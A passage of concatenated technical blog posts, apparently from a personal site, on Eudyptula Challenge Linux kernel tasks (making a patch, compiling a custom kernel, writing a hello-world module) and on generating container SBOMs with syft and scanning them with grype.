Executing this command should give you output like below.\ndiff --git a/Makefile b/Makefile index 1a6678d81..25e909b50 100644 --- a/Makefile +++ b/Makefile @@ -2,7 +2,7 @@ VERSION = 5 PATCHLEVEL = 19 SUBLEVEL = 0 -EXTRAVERSION = -rc2 +EXTRAVERSION = -ExtraVersionText NAME = Superb Owl # *DOCUMENTATION* But this is not a patch\u0026hellip; it is just a diff, showing what things changed. To make an actual patch you need to do more than this.\n## After modifying the Makefile git add Makefile git commit -m \u0026#34;Modified Makefile\u0026#34; git format-patch -1 HEAD -- Makefile ## OUTPUT - 0001-modified-makefile.patch # COMMAND - cat 0001-modified-makefile.patch From 45176125f95a5606ab4334f334634e19492f4928 Mon Sep 17 00:00:00 2001 From: ayedaemon \u0026lt;ris3234@gmail.com\u0026gt; Date: Sat, 18 Jun 2022 10:54:16 +0530 Subject: [PATCH] modified makefile --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index b815ea3..7d97ece 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,6 @@ VERSION = 5 PATCHLEVEL = 19 SUBLEVEL = 0 -EXTRAVERSION = -rc2 +EXTRAVERSION = -ExtraVersionText NAME = Superb Owl -- 2.36.1 Now this gives you a patch file in an email format. That\u0026rsquo;s convenient if you just want to generate a patch and send it to someone using CLI mail client tools. Your work as a bug fixer/ feature developer/ etc is done once you have submitted the patch.\nSubmit the patch!! But where?? Linux kernel developers have also written a script for you that finds the maintainers for a file.\n./scripts/get_maintainer.pl -f Makefile Output:-\nMasahiro Yamada \u0026lt;masahiroy@kernel.org\u0026gt; (maintainer:KERNEL BUILD + files below scripts/ (unless mai...) Michal Marek \u0026lt;michal.lkml@markovi.net\u0026gt; (maintainer:KERNEL BUILD + files below scripts/ (unless mai...) Nick Desaulniers \u0026lt;ndesaulniers@google.com\u0026gt; (reviewer:KERNEL BUILD + files below scripts/ (unless mai...) 
Nick Terrell \u0026lt;terrelln@fb.com\u0026gt; (maintainer:ZSTD) Alexei Starovoitov \u0026lt;ast@kernel.org\u0026gt; (supporter:BPF (Safe dynamic programs and tools)) Daniel Borkmann \u0026lt;daniel@iogearbox.net\u0026gt; (supporter:BPF (Safe dynamic programs and tools)) Andrii Nakryiko \u0026lt;andrii@kernel.org\u0026gt; (supporter:BPF (Safe dynamic programs and tools)) Martin KaFai Lau \u0026lt;kafai@fb.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) Song Liu \u0026lt;songliubraving@fb.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) Yonghong Song \u0026lt;yhs@fb.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) John Fastabend \u0026lt;john.fastabend@gmail.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) KP Singh \u0026lt;kpsingh@kernel.org\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) Nathan Chancellor \u0026lt;nathan@kernel.org\u0026gt; (supporter:CLANG/LLVM BUILD SUPPORT) Tom Rix \u0026lt;trix@redhat.com\u0026gt; (reviewer:CLANG/LLVM BUILD SUPPORT) linux-kbuild@vger.kernel.org (open list:KERNEL BUILD + files below scripts/ (unless mai...) linux-kernel@vger.kernel.org (open list) netdev@vger.kernel.org (open list:BPF (Safe dynamic programs and tools)) bpf@vger.kernel.org (open list:BPF (Safe dynamic programs and tools)) llvm@lists.linux.dev (open list:CLANG/LLVM BUILD SUPPORT) The above list gives you the recipients for your patch. Before submitting your patch, please read the official kernel documentation2 to know more about patch submissions.\nhow do they apply my patch?? Maintainers (or the person you just submitted your patch to) will check your patch and if everything is good, they\u0026rsquo;ll apply your patch to their codebase.\ngit provides an easy way to do that using the patch file\u0026hellip; just type the below command and the patch will be applied.\ngit apply 0001-modified-makefile.patch Conclusion The Linux kernel is a very large project which involves tons of people. 
This looks very chaotic and scary, but it works!! Among many other tools/scripts, Git and Makefiles are the 2 important tools this chaotic process relies upon. One should have good understanding about these tools to take part in the development process of kernel.\nhttps://www.kernel.org/doc/html/latest/kbuild/makefiles.html#the-kbuild-files\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/process/submitting-patches.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-3/","summary":"This is Task 03 of the Eudyptula Challenge ------------------------------------------ Now that you have your custom kernel up and running, it\u0026#39;s time to modify it! The tasks for this round is: - take the kernel git tree from Task 02 and modify the Makefile to and modify the EXTRAVERSION field. Do this in a way that the running kernel (after modifying the Makefile, rebuilding, and rebooting) has the characters \u0026#34;-eudyptula\u0026#34; in the version string.","title":"Eudyptula Task3"},{"content":"This is Task 02 of the Eudyptula Challenge ------------------------------------------ Now that you have written your first kernel module, it\u0026#39;s time to take off the training wheels and move on to building a custom kernel. No more distro kernels for you, for this task you must run your own kernel. And use git! Exciting isn\u0026#39;t it! No, oh, ok... The tasks for this round is: - download Linus\u0026#39;s latest git tree from git.kernel.org (you have to figure out which one is his, it\u0026#39;s not that hard, just remember what his last name is and you should be fine.) - build it, install it, and boot it. You can use whatever kernel configuration options you wish to use, but you must enable CONFIG_LOCALVERSION_AUTO=y. - show proof of booting this kernel. 
Bonus points for you if you do it on a \u0026#34;real\u0026#34; machine, and not a virtual machine (virtual machines are acceptable, but come on, real kernel developers don\u0026#39;t mess around with virtual machines, they are too slow. Oh yeah, we aren\u0026#39;t real kernel developers just yet. Well, I\u0026#39;m not anyway, I\u0026#39;m just a script...) Again, proof of running this kernel is up to you, I\u0026#39;m sure you can do well. Hint, you should look into the \u0026#39;make localmodconfig\u0026#39; option, and base your kernel configuration on a working distro kernel configuration. Don\u0026#39;t sit there and answer all 1625 different kernel configuration options by hand, even I, a foolish script, know better than to do that! After doing this, don\u0026#39;t throw away that kernel and git tree and configuration file. You\u0026#39;ll be using it for later tasks, a working kernel configuration file is a precious thing, all kernel developers have one they have grown and tended to over the years. This is the start of a long journey with yours, don\u0026#39;t discard it like was a broken umbrella, it deserves better than that. What, why? Kernel is the main component of any operating system and is also referred as the \u0026ldquo;Heart of the Operating System\u0026rdquo;. It is at the core of all the layers present in OS and can have complete access to all the hardware (CPU, disk, RAM, etc). Therefore, it runs on very high privileges. Basically it handles most of the hardware related tasks (Allocate memory, CPU scheduling, etc) and most of the process related tasks (Copying file from/to disk, Uploading/Downloading, opening browser to read this blog, etc)\nWait, what? Does it have control to everything we do on our computers?\nA big YES and small no. It is responsible to send data across multiple resources in your system and it can intercept everything there. 
But it depends on whether it can understand what it sees.\nThe kernel has mainly 4 tasks:\nKeep track of the memory - who is using it and how much; And where. Decides who uses CPU, when and for how long Takes data from processes and passes sensible code to hardware for processing it and vice versa. Receives requests via system calls (API calls; but not Web API calls) from processes. This is used to do low level stuff and build amazing tools like docker. Talking to the kernel is difficult and can be dangerous if not done properly. Most of the time, users do not need to talk to the kernel directly; they have a few layers of abstraction on top of it - Device drivers, system libraries, CLI shells, GUI shells (Graphical thing which comes up, when you start your system), etc.\nThis gives rise to the idea of 2 spaces - user space and kernel space. Kernel space is the memory segment that is used only by the kernel, and users stay out of it. The other is the user space memory segment, where users can do whatever they want.\nThe rough mind map would look something like below\n[ [ [ [Hardware] --\u0026gt; Kernel ] --\u0026gt; OS ] --\u0026gt; Process(browser)] # If process fails in OS, damage is small and might be recovered by kernel. # If kernel crashes, Your system goes down. # If hardware fails, you cry!! This is the complete bundle which makes up your system. Now what I want to take out of this whole jibber-jabber is that a kernel is a piece of software that works with hardware and other user-friendly software to solve your problems or play games and have fun.\nSince it is a piece of software, we can download it and replace old versions with new versions (manually or via a script/program/whatever). Another option for tech savvy people is to custom compile it. There could be many reasons to compile a Linux kernel by yourself; a few possible reasons are:-\nYou want to know how it is done. You might want to brag about it and feel superior and very tech savvy. 
You want to face \u0026ldquo;I use arch BTW\u0026rdquo; community. (FYI, I use arch BTW!!) You want optimal performance on specific hardware and architecture. You might want to disable/enable some kernel features. You might want to add support for extra hardware. You are solving eudyptula challenge, just like me :) Regardless of why, knowing how to compile a linux kernel is very useful and cool.\nGetting the source code for kernel. Getting the source code for the kernel is very easy. You just need to go to kernel.org and download the required files. I\u0026rsquo;ll be compiling Linus Torvalds\u0026rsquo;s git tree source code on archlinux/archlinux vagrant box.1\n# Use git to download the linux kernel source code. (just the latest commit =\u0026gt; --depth=1) git clone --depth=1 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git The Linux kernel is a very large piece of software and might take a minute to download (depending upon your connectivity). This is one of the reasons why most of the extended functionality is provided via loadable kernel modules. If you don\u0026rsquo;t know about kernel modules then read the Eudyptula Task1 blog.\nInside the cloned directory, we have multiple files and sub-directories. Each sub-directory has a specific purpose: arch contains files for different system architectures, and security contains files for selinux, apparmor and other security related code. In short, the Linux kernel is developed by thousands of developers in collaboration; not everybody knows about each file present in the source code, and yet they have an understanding of where they have to make changes to achieve their goal. Very neat management!!\nCompiling Linux kernel Just like every configurable software, the Linux kernel also provides configuration support via a .config file. 
We can either use other kernel\u0026rsquo;s config file or write a config file by ourselves.\nCreating own config file from scratch Creating own config file from scratch can be a bad idea for someone who is doing it for very first time. But if you still want to do it, I\u0026rsquo;m not gonna stop you. You can make the use of Makefile by typing make config from inside the kernel source code directory and then you\u0026rsquo;ll have to simply answer yes or no for all the configurable options that kernel supports. Read more here\nUsing existing config file You can copy the config file of your existing kernel and use it as a base config to make further changes. This is a very efficient method if there are only few changes you need to make. Most of the kernel developers have their own config files which they have fine-tuned in so many years. To know about how to get config file for your linux system read this stackoverflow thread. For my vagrant system, I can check my running kernel\u0026rsquo;s config file using below command\nls /proc/config.gz zcat /proc/config.gz | grep \u0026#34;.*CONFIG_\u0026#34; | wc -l # Output = 9128 There are total 9128 configurable options here and it is very impractical to make all the proper changes with a text editor in one go, so instead, we will do it with some TUI script. Below script will copy the config file to working directory and start the TUI for you. Navigate to linux source code directory and run the below script.\n# Copy config file and take a backup for later review zcat /proc/config.gz \u0026gt; .config cp .config ../old.config # Install requirements to run `make menuconfig` sudo pacman -S --noconfirm --needed\\ pkg-config ncurses \\ gcc \\ flex \\ bison # Update config file. make menuconfig Linux kernel has a lot of make options and the best way to check supporting make options is via make help command. 
After executing make menuconfig, a TUI will open in the shell which will help you to update, save and load the new configuration. This command uses the .config file from the current directory to pre-fill the old config options; this makes it very easy for us to just focus on what we want to change.\nFor my config file, I simply enabled the CONFIG_PRINTK_CALLER and CONFIG_LOCALVERSION_AUTO features of the kernel\u0026hellip; and then saved the file with a filename - new.config (I want to keep it backed up for future tasks). We can compare the changed values from the old .config and newer new.config and see the difference.\ndiff .config ../old.config | grep -i -E \u0026#39;localver|printk\u0026#39; # \u0026lt; CONFIG_LOCALVERSION=\u0026#34;ayedaemon\u0026#34; # \u0026gt; CONFIG_LOCALVERSION=\u0026#34;\u0026#34; # \u0026lt; CONFIG_PRINTK_CALLER=y # \u0026gt; # CONFIG_PRINTK_CALLER is not set Now we have very few steps left to be done. We need to compile the kernel, then install the modules and finally, install the kernel. Run the below commands to get this done.\n# Update .config with newer config file mv -v new.config .config # Backup the newer config file cp -v .config ../new.config # Install some more dependencies sudo pacman -S --noconfirm --needed \\ bc \\ cpio # If on arch based distro or using my vagrantfile # Compile kernel (might require your input) - use -j4 to make it build faster make -j4 # Install modules (takes some time) - use -j4 to make it build faster sudo make modules_install -j4 If you are using the LILO bootloader, then the kernel makefile will do the job for you with this command - sudo make install. 
But if you are using GRUB, then you will have to do some manual steps by running the below commands.\n# Copy kernel image to /boot sudo cp arch/x86_64/boot/bzImage /boot/vmlinuz-ayedaemonlinux # Copy system.map to /boot sudo cp System.map /boot/System-ayedaemonlinux.map # Copy config file to /boot (just to be safe) sudo cp .config /boot/ayedaemonlinux.kernel.config Let\u0026rsquo;s take a minute to see what we just did. After we configured the Linux kernel using make and the .config file, we compiled the kernel with our configuration requirements and then installed all the modules required. Once this is done, we have the 2 important files we need :-\nvmlinuz =\u0026gt; Is the actual kernel file. Yes, it is the kernel you have been waiting for so long. If you fancy, do file /boot/vmlinuz-ayedaemonlinux and check the results. System.map =\u0026gt; This is the map file which stores the kernel symbol table information. Read more about it here Anyways, we need these files in our /boot/ directory so that our boot-loader can load our compiled kernel. But our boot-loader is dumb; it cannot simply detect the files in /boot/ and show us options on the boot-loader screen, so we will have to take care of that as well. You might also need to generate an initrd file depending upon what configuration you are using on your system. If you are following the steps from this blog, then you need an initrd for sure. The initrd (initial RAM disk) is an image that helps your kernel to load and boot up properly by providing the modules that are not built into the kernel at compile time. In this blog, we have not compiled into the kernel all the modules that it might need at boot time, so we will create an initrd file and then we can tell our boot loader about our custom kernel.\nUse the mkinitcpio command to generate an initrd file and then update the bootloader config using the grub-mkconfig command. If you want this kernel to be the default, then you\u0026rsquo;ll have to make proper changes to the boot config file. 
Read more about it from arch wiki or stackoverflow. If you are someone who prefers easy workarounds, you can also select the new kernel from the grub menu at boot time; just make sure that the GRUB_TIMEOUT variable (from /etc/default/grub) is not set to zero.\n# generate initramfs sudo mkinitcpio -k 5.18.0ayedaemon-g8ab2afa23bd1 -g /boot/initramfs-ayedaemonlinux.img # update grub config - add entry to boot menu sudo grub-mkconfig -o /boot/grub/grub.cfg # Setup grub boot order if you want to - else use the lazy way Output:-\n# sudo grub-mkconfig -o /boot/grub/grub.cfg Generating grub configuration file ... Found linux image: /boot/vmlinuz-linux Found initrd image: /boot/initramfs-linux.img Found fallback initrd image(s) in /boot: initramfs-linux-fallback.img Found linux image: /boot/vmlinuz-ayedaemonlinux Found initrd image: /boot/initramfs-ayedaemonlinux.img Warning: os-prober will not be executed to detect other bootable partitions. Systems on them will not be added to the GRUB boot configuration. Check GRUB_DISABLE_OS_PROBER documentation entry. done From the output of the last command, we can see that my ayedaemonlinux was detected by grub, which also updated the /boot/grub/grub.cfg file with the current detections. Now, let\u0026rsquo;s reboot and hope everything works as expected. Select the custom kernel from the grub menu if needed and boot into it. If successful, you can check the kernel version and other information with the uname command.\n# Before Reboot --\u0026gt; uname -a Linux archlinux 5.18.1-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 30 May 2022 17:53:11 +0000 x86_64 GNU/Linux # After Reboot --\u0026gt; uname -a Linux archlinux 5.18.0ayedaemon-g8ab2afa23bd1 #1 SMP PREEMPT_DYNAMIC Wed Jun 1 16:54:51 UTC 2022 x86_64 GNU/Linux We just compiled our very own first kernel. Since we have not changed many kernel parameters, no user-space programs are affected by this.
But we get our name on the kernel tag!!\nArch is a rolling distro and the packages can be easily upgraded to latest versions available. No \u0026lt;package-name\u0026gt; too old kind of errors.\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-2/","summary":"This is Task 02 of the Eudyptula Challenge ------------------------------------------ Now that you have written your first kernel module, it\u0026#39;s time to take off the training wheels and move on to building a custom kernel. No more distro kernels for you, for this task you must run your own kernel. And use git! Exciting isn\u0026#39;t it! No, oh, ok... The tasks for this round is: - download Linus\u0026#39;s latest git tree from git.","title":"Eudyptula Task2"},{"content":"The concept of a Bill Of Materials (BOM) is well-established in traditional manufacturing as part of supply chain management. A manufacturer uses a BOM to track the parts it uses to create a product. If defects are later found in a specific part, the BOM makes it easy to locate affected products. In software industry, this concept is fairly new and is used to keep track of all the ingredients of the software.\nWhat is SBOM ?? A software bill of materials (SBOM) is a formal record of the components used to develop software and its software supply chain relationships, according to the National Telecommunications and Information Administration (NTIA). An SBOM covers both open source (OSS) and proprietary software, creating transparency into potential vulnerabilities and elements within the software. SBOMs can be used for vulnerability management and product integrity.\nAn SBOM is useful both to the builder (manufacturer) and the buyer (customer) of a software product. 
Builders often leverage available open source and third-party software components to create a product; an SBOM allows the builder to make sure those components are up to date and to respond quickly to new vulnerabilities. Buyers can use an SBOM to perform vulnerability or license analysis, both of which can be used to evaluate risk in a product.\nWhy SBOM ?? There could be multiple uses of an SBOM, like\nEasy End-Of-Life management for dependencies and the product itself. License obligations and policy compliance. For developers, it can help to unbloat the software by identifying the BOM and cleaning up unused things, or it can be used for quality assurance. Identify and eliminate vulnerabilities from early stages (more shift left) There are many artifacts that can provide SBOM information, and this information can be correlated and used together to provide better security insights. These artifacts could be the source code, executables, published software, or in the devops world, containers!!\nContainers are an easy way to package and deliver software; a container is like an encapsulated artifact. Here we can get an SBOM for Application dependencies, Secret code, OS packages, Licenses, File data, Configuration files, Container meta-data, etc. When it comes to security, it’s important to know every part of the system. An SBOM gives you a clear list of components that helps in monitoring every part for vulnerabilities.\nExisting SBOM formats A new SBOM can be created and published in various formats including HTML, CSV, PDF, Markdown, and plain text. SBOM formats are still in development and new formats might arise in future that can address specific problems in a better way. Currently used formats are - Software Package Data Exchange (SPDX), Software Identification (SWID) Tags, and CycloneDX.\nSPDX Also known as ISO/IEC 5962:2021, SPDX is spearheaded by The Linux Foundation.
It is an open standard for describing SBOM information related to provenance, licensing, and security.\nSWID Tags This format identifies and reports software components under four categories across the development lifecycle:\nCorpus Tags: Identifies and describes components in a pre-installation stage. Primary Tags: Identifies and describes components in a post-installation stage. Patch Tags: Identifies and describes the patch. Supplement Tags: Allows only the tag creator to modify corpus, primary, and patch tags. CycloneDX Managed by the CycloneDX core working group, it is designed for application security contexts. CycloneDX is considered a lightweight standard with features of both SPDX and SWID. It includes four data fields:\nBOM Metadata: Description of the supplier, manufacturer, component, and compilation tools. Components: Complete information on proprietary and open-source components along with licensing requirements. Services: A list of external APIs that the software may invoke. Dependencies: All forms of relationship within the supply chain. Don\u0026rsquo;t talk, show!!
For the demo, I\u0026rsquo;ve created a basic flask application that says hello and have containerized it into 3 different base images - ubuntu, alpine and distroless.\nCONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 783618b1c6df sbom_distroless \u0026#34;/usr/bin/python3.9 …\u0026#34; 9 seconds ago Up 7 seconds sbom_distroless_demo 3ed64aef4767 sbom_alpine \u0026#34;python app.py\u0026#34; 16 seconds ago Up 14 seconds sbom_alpine_demo fe18c421777a sbom_ubuntu \u0026#34;python3 app.py\u0026#34; 19 seconds ago Up 17 seconds sbom_ubuntu_demo We can check the size of the container image using docker images command.\nsbom_distroless latest 6ef7ccd61f84 38 minutes ago 166MB sbom_alpine latest e7e71b412cf5 About an hour ago 161MB sbom_ubuntu latest 9e2166292230 About an hour ago 573MB If you want to get more details about the size of each layer then you can use docker history \u0026lt;image\u0026gt; command. More information about the running container (process) can be obtained using docker inspect \u0026lt;container\u0026gt;.\nAll these commands are good, but they do not provide any information about the application and its dependencies. Docker has recently announced its experimental feature - docker sbom, that allows us to generate the SBOM of a container image. 
Today, it does this by scanning the layers of the image using the Syft project but in future it may read the SBOM from the image itself or elsewhere.\nLet\u0026rsquo;s generate a SBOM for our containers by directly using the syft project.\nsyft sbom_distroless ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [69 packages] NAME VERSION TYPE Flask 2.1.2 python Jinja2 3.1.2 python MarkupSafe 2.1.1 python Werkzeug 2.1.2 python base-files 11.1+deb11u3 deb boto3 1.23.9 python botocore 1.26.9 python certifi 2022.5.18.1 python charset-normalizer 2.0.12 python click 8.1.3 python dash 0.5.11+git20200708+dd9ef66-5 deb idna 3.3 python importlib-metadata 4.11.4 python itsdangerous 2.1.2 python jmespath 1.0.0 python libbz2-1.0 1.0.8-4 deb libc-bin 2.31-13+deb11u3 deb libc6 2.31-13+deb11u3 deb libcom-err2 1.46.2-2 deb libcrypt1 1:4.4.18-4 deb libdb5.3 5.3.28+dfsg1-0.8 deb libexpat1 2.2.10-2+deb11u3 deb libffi7 3.3-6 deb libgcc-s1 10.2.1-6 deb libgomp1 10.2.1-6 deb libgssapi-krb5-2 1.18.3-6+deb11u1 deb libk5crypto3 1.18.3-6+deb11u1 deb libkeyutils1 1.6.1-2 deb libkrb5-3 1.18.3-6+deb11u1 deb libkrb5support0 1.18.3-6+deb11u1 deb liblzma5 5.2.5-2.1~deb11u1 deb libmpdec3 2.5.1-1 deb libncursesw6 6.2+20201114-2 deb libnsl2 1.3.0-2 deb libpython3.9-minimal 3.9.2-1 deb libreadline8 8.1-1 deb libsqlite3-0 3.34.1-3 deb libssl1.1 1.1.1n-0+deb11u2 deb libstdc++6 10.2.1-6 deb libtinfo6 6.2+20201114-2 deb libtirpc3 1.3.1-1 deb libuuid1 2.36.1-8+deb11u1 deb netbase 6.3 deb openssl 1.1.1n-0+deb11u2 deb pip 22.0.4 python pip 22.1.1 python python-dateutil 2.8.2 python python3-distutils 3.9.2-1 deb requests 2.27.1 python s3transfer 0.5.2 python setuptools 58.1.0 python six 1.16.0 python tzdata 2021a-1+deb11u3 deb urllib3 1.26.9 python wheel 0.37.1 python zipp 3.8.0 python zlib1g 1:1.2.11.dfsg-2+deb11u1 deb By default, syft parses and analyses the final layer of the container and displays the tabular result on the standard output (stdout). 
This is good if we just want to see the SBOM ourselves and do not want to share it with other tools or people. To save the output to a file you can use the --file option, and you can also specify other formats that are widely used by the community with the -o or --output flag. The bash script below will create cyclonedx-json, github-json, spdx-json and syft-json format SBOMs and store them in their respective files.\nmkdir -p generated_sboms; for i in sbom_{ubuntu,distroless,alpine}; do mkdir -p generated_sboms/$i echo $i; syft $i \\ -o syft-json=generated_sboms/$i/syft.json \\ -o spdx-json=generated_sboms/$i/spdx.json \\ -o github-json=generated_sboms/$i/github.json \\ -o cyclonedx-json=generated_sboms/$i/cyclonedx.json done The output of the above script gives us the package count for each image. It is clear that ubuntu has the most packages, as it is a full-fledged distro with a lot of system files, manpages, etc\u0026hellip; and the distroless image has the fewest. The idea of distroless is somewhat over-hyped in the world of containers and is sometimes tied to the security idea of a minimum attack surface. Here is a RedHat article that tries to give a clear understanding of the benefits of distroless containers and the myths around them.\nsbom_ubuntu ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [265 packages] sbom_distroless ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [69 packages] sbom_alpine ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [71 packages] And it\u0026rsquo;ll create a directory with organised json files\n# tree generated_sboms/ generated_sboms/ ├── sbom_alpine │ ├── cyclonedx.json │ ├── github.json │ ├── spdx.json │ └── syft.json ├── sbom_distroless │ ├── cyclonedx.json │ ├── github.json │ ├── spdx.json │ └── syft.json └── sbom_ubuntu ├── cyclonedx.json ├── github.json ├── spdx.json └── syft.json Now we have our sbom files and we can share these files with other people who need them.
It can be our customers, external auditors, Incident response team, etc etc\u0026hellip; Also we can use these files with another tool that can check these images for vulnerabilities. One such tool is grype - A vulnerability scanner for container images and filesystems that works exceptionally well with Syft. The script below will generate grype results for all the 3 images using their respective spdx.json files.\nmkdir -p grype_results; for i in sbom_{ubuntu,distroless,alpine}; do echo $i; mkdir -p grype_results/$i grype sbom:./generated_sboms/$i/spdx.json \\ -o json \\ --file grype_results/$i/all.json done Like all static analysers, this tool might generate tons of false positives. Apart from this, the grype tool provides tons of configuration features that can come in handy for automation and several other use cases. A lot of other commercial and open-source tools are emerging that can leverage SBOMs and help to solve problems around licensing and policy compliance, security audits, quality assurance, etc.\nSBOM misconception There are a few misconceptions or myths about SBOMs, like it can :-\nbe a roadmap to the attacker ? require source code disclosure ? expose my intellectual properties ? .. etc Here is an NTIA publication that covers the explanation of some such myths V/S facts.\n","permalink":"https://ayedaemon.github.io/post/2022/05/hands-on-intro-to-sbom/","summary":"The concept of a Bill Of Materials (BOM) is well-established in traditional manufacturing as part of supply chain management. A manufacturer uses a BOM to track the parts it uses to create a product. If defects are later found in a specific part, the BOM makes it easy to locate affected products. In software industry, this concept is fairly new and is used to keep track of all the ingredients of the software.","title":"Hands-on Intro to SBOM"},{"content":"What is this?
The Eudyptula Challenge is a series of programming exercises for the Linux kernel, that start from a very basic “Hello world” kernel module, moving on up in complexity to getting patches accepted into the main Linux kernel source tree.\nUnfortunately, this project is not accepting any new applicants right now. So I decided to gather tasks details from other online sources and complete them locally.\nTask-1 This is Task 01 of the Eudyptula Challenge ------------------------------------------ Write a Linux kernel module, and stand-alone Makefile, that when loaded prints to the kernel debug log level, \u0026#34;Hello World!\u0026#34; Be sure to make the module be able to be unloaded as well. The Makefile should build the kernel module against the source for the currently running kernel, or, use an environment variable to specify what kernel tree to build it against. Linux provides a powerful and expansive API for applications, but sometimes that’s not enough. Interacting with a piece of hardware or conducting operations that require access to privileged information in the system can require a kernel module. In this task we have to write a kernel module that basically prints \u0026ldquo;Hello World!\u0026rdquo;.\nWhat is a Kernel Module? A Linux kernel module is a piece of compiled binary code that is inserted directly into the Linux kernel, running at ring 0, the lowest and least protected ring of execution in the x86–64 processor. Code here runs completely unchecked but operates at incredible speed and has access to everything in the system.\nA loadable kernel module (LKM) is a mechanism for adding code to, or removing code from, the Linux kernel at run time. They are ideal for device drivers, enabling the kernel to communicate with the hardware without it having to know how the hardware works. 
The alternative to LKMs would be to build the code for each and every driver into the Linux kernel.\nWithout this modular capability, the Linux kernel would be very large, as it would have to support every driver that would ever be needed for the system to work properly. You would also have to rebuild the kernel every time you wanted to add new hardware or update a device driver.\nKernel modules run in kernel space and applications run in user space, and both kernel space and user space have their own unique memory address spaces that do not overlap. This approach ensures that applications running in user space have a consistent view of the hardware, regardless of the hardware platform. The kernel services are then made available to the user space in a controlled way through the use of system calls. The kernel also prevents individual user-space applications from conflicting with each other or from accessing restricted resources through the use of protection levels (e.g., superuser versus regular user permissions).\nPrepare system for building LKMs The system must be prepared to build kernel code, and to do this you must have the Linux headers installed on your device. On a typical Linux desktop machine you can use your package manager to locate the correct package to install. For example, under 64-bit CentOS 7 you can use the commands below. Sometimes the package manager provides multiple versions of the headers; in that case you must install the headers for the exact version of your running kernel.\n# Update system sudo yum update -y # Install headers sudo yum install -y kernel-devel kernel-headers # Check headers ls /usr/src/kernels/$(uname -r) Write first module - Hello World The LKM code is very different from the regular user-space C program. Typical computer programs are reasonably straightforward. A loader allocates the memory for the program, then loads the program and other shared libraries into memory.
Instruction execution begins at some entrypoint (typically main() in C/C++ programs). On exit, the OS reclaims any memory the program still holds and returns it to the pool.\nLKMs are not applications - for a start, there is no main() and no printf() function!! They also do not have any automatic cleanup. Interestingly, they also do not have any floating-point support. An LKM has at least 2 entrypoint-like functions; these functions execute when the LKM is loaded or unloaded.\nThe above can be a lot to digest all at once, but it is important that these points are addressed. Now, we can wrap our minds around the code below and understand how it works.\nTo start with, we need a HelloWorld.c file with 2 function definitions - hello_world_init() and hello_world_exit(). We then register the first function to be executed when the LKM is loaded into memory, and the latter to be executed when the LKM is unloaded. There are a few extra macros that configure the metadata for the created module.\n#include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task1\u0026#34;); static int hello_world_init(void) { printk(KERN_DEBUG \u0026#34;Hello World!\\n\u0026#34;); return 0; } static void hello_world_exit(void) { printk(KERN_DEBUG \u0026#34;Bye Bye World!\\n\u0026#34;); } module_init(hello_world_init); module_exit(hello_world_exit); In kernel space, we do not have access to the printf() function; instead we have a function with very similar usage called printk()1, and you can call it from anywhere within the LKM code.
Read more about printk() from here.2\nNow that we’ve constructed the simplest possible module, let’s understand the important parts in detail:\nThe “includes” cover the header files necessary for Linux kernel development.\nMODULE_LICENSE can be set to a variety of values depending on the license3 of the module. The following 2 lines are also a part of the module metadata.\nAt the end of the file, we call module_init and module_exit to tell the kernel which functions are our loading and unloading functions. This gives us the freedom to name the functions whatever we like.\n\u0026hellip; make Makefile A Makefile is required to build the kernel module; in fact, it is a special kbuild Makefile. Below is the Makefile used to build the above LKM code.\nobj-m += HelloWorld.o KDIR := /lib/modules/$(shell uname -r)/build all: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: $(MAKE) -C $(KDIR) M=$(PWD) clean The first line of this Makefile is called the goal definition and it defines the module to be built. The rest of the Makefile is a regular makefile. Here, the -C option switches to the kernel build directory before performing any make tasks. The M=$(PWD) variable assignment tells the make command where the actual project files exist, which lets make return to the project directory from the kernel directory.\nAll going well, the process to build the kernel module should be straightforward, provided that you have installed the Linux headers as described earlier. The steps are as follows:\n[vagrant@centos7 task-1]$ ls HelloWorld.c Makefile README.md [vagrant@centos7 task-1]$ make make -C /lib/modules/3.10.0-1160.62.1.el7.x86_64/build M=/vagrant_data/task-1 modules make[1]: Entering directory `/usr/src/kernels/3.10.0-1160.62.1.el7.x86_64\u0026#39; CC [M] /vagrant_data/task-1/HelloWorld.o Building modules, stage 2.
